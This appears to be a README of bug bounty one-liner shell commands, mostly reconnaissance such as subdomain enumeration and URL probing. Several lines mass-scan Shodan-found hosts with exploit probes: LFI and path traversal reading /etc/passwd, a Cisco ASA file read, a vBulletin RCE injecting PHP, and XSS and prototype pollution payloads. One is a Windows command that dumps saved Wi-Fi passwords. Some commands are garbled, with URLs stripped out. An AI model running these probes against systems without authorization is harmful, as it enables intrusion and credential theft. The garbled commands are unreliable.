A collection of awesome one-liner scripts especially for bug bounty. Thanks for visiting my repository! If you find my and other work useful, please consider buying me a coffee to support my future projects.
Please note that this command is just an example and it may not work correctly. It is important to test it and understand the command before you use it in a production environment.
This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome.
This section defines specific terms or placeholders that are used throughout one-line command/scripts.
- 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by
, or127.0.0.1
. - 1.2. "HOSTS.txt" contains criteria 1.1 with more than one in file.
- 2.1. "URL" definitely defines the URL, e.g. replaced by
or somewhat starting with HTTP/HTTPS protocol. - 2.2. "URLS.txt" contains criteria 2.1 with more than one in file.
- 3.1. "FILE.txt" or "FILE
.txt" means the files needed to run the command/script according to its context and needs. - 4.1. "OUT.txt" or "OUT
.txt" means the file as the target storage result will be the command that is executed.
Local File Inclusion
gau -f HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -v -L --retry 3 --retry-delay 5 --retry-max-time 30 -s "%" 2>&1 | grep -q "root:x" && echo -e "\e[31mVULN! %\e[0m" || echo -e "\e[32mSAFE! %\e[0m"'
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'response=$(curl -Is "%" -w %{url_effective} -o /dev/null -s); if echo $response | grep -q "Location: $LHOST"; then echo -e "\e[32mVULN\e[39m! %"; elif echo $response | grep -q "HTTP/1.1 3"; then echo -e "\e[33mPOTENTIAL VULN\e[39m! %"; else echo -e "\e[31mNot VULN\e[39m"; fi'
Prototype Pollution
cat FILE.txt | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep --color "VULNERABLE" > output.txt
Passowrd Dump
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @if "%j" NEQ "" (echo SSID: %j & netsh wlan show profiles %j key=clear | findstr "Key Content") >> Wifi-password.txt
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt
cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
Extract Endpoints from swagger.json
curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'
Extracts Juicy Informations
@Prial Islam Khan
for sub in $(cat HOSTS.txt); do gron "$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done
Get CIDR & Orgz from Target Lists
for DOMAIN in $(cat domains.txt); do for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; done | uniq | tee -a output.txt; done
Find Subdomains TakeOver
subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/ -v 3 >> takeover ;
Dump Custom URLs from ParamSpider
cat HOSTS.txt | xargs -I % python3 -l high -o ./OUT/% -d %;
URLs Probing with cURL + Parallel
cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
Dump In-scope Assets from @dwisiswant0
curl -sL | jq -r '.programs[].domains | to_entries | .[].value'
HackerOne Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
BugCrowd Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
Intigriti Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
YesWeHack Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
HackenProof Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'
Federacy Programs
curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
Dump URLs from sitemap.xml
curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'
Pure Bash Linkfinder
curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > FILE.txt; while IFS= read link; do python -i "$link" -o cli; done < FILE.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf FILE.txt
curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'
CORS Misconfiguration
site="URL"; gau "$site" | while read url; do target=$(curl -sIH "Origin:" -X GET $url) | if grep ''; then [Potentional CORS Found] echo $url; else echo Nothing on "$url"; fi; done
Find Hidden Servers and/or Admin Panels
ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt
Recon Using
curl -s -w "\n%{http_code}" | jg .[].domain
Find Live Host/Domain/Assets
subfinder -d HOST -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
XSS without gf
waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -sk --path-as-is "$host" | grep -qs "<script>alert(1)</script>" && echo "$host is vulnerable"; done
Get Subdomains from IPs
python3 HOSTS.txt > OUT.txt
Gather Domains from Content-Security-Policy
curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" | sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u
Nmap IP:PORT Parser Piped to HTTPX
nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r ' | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | httpx --silent
Get Subdomains from
curl -s "$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u
Get Subdomains from
curl -s | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
export domain="HOST"; curl "$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"
Get Subdomains from
curl -s "" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomains from VirusTotal
curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomain with cyberxplore
curl -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+"
Get Subdomains from CertSpotter
curl -s "" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomains from Archive
curl -s "*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
Get Subdomains from JLDC
curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
Get Subdomains from securitytrails
curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u
Bruteforcing Subdomain using DNS Over
while read sub; do echo "$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt
Get Subdomains With
curl --silent | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u
Get Subdomains With
curl --silent -X POST -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u
Get Subdomains from
curl -s "" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
Sort & Tested Domains from
curl "" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent
Subdomain Bruteforcer with FFUF
ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'
Find Allocated IP Ranges for ASN from IP Address
whois -h -i origin -T route $(whois -h IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n
Extract IPs from a File
grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
Ports Scan without CloudFlare
subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe
Create Custom Wordlists
gau HOST | unfurl -u keys | tee -a FILE1.txt; gau HOST | unfurl -u paths | tee -a FILE2.txt; sed 's#/#\n#g' FILE2.txt | sort -u | tee -a FILE1.txt | sort -u; rm FILE2.txt | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' FILE1.txt
cat HOSTS.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a FILE.txt
Find JavaScript Files
assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done
Extract Endpoints from JavaScript
cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u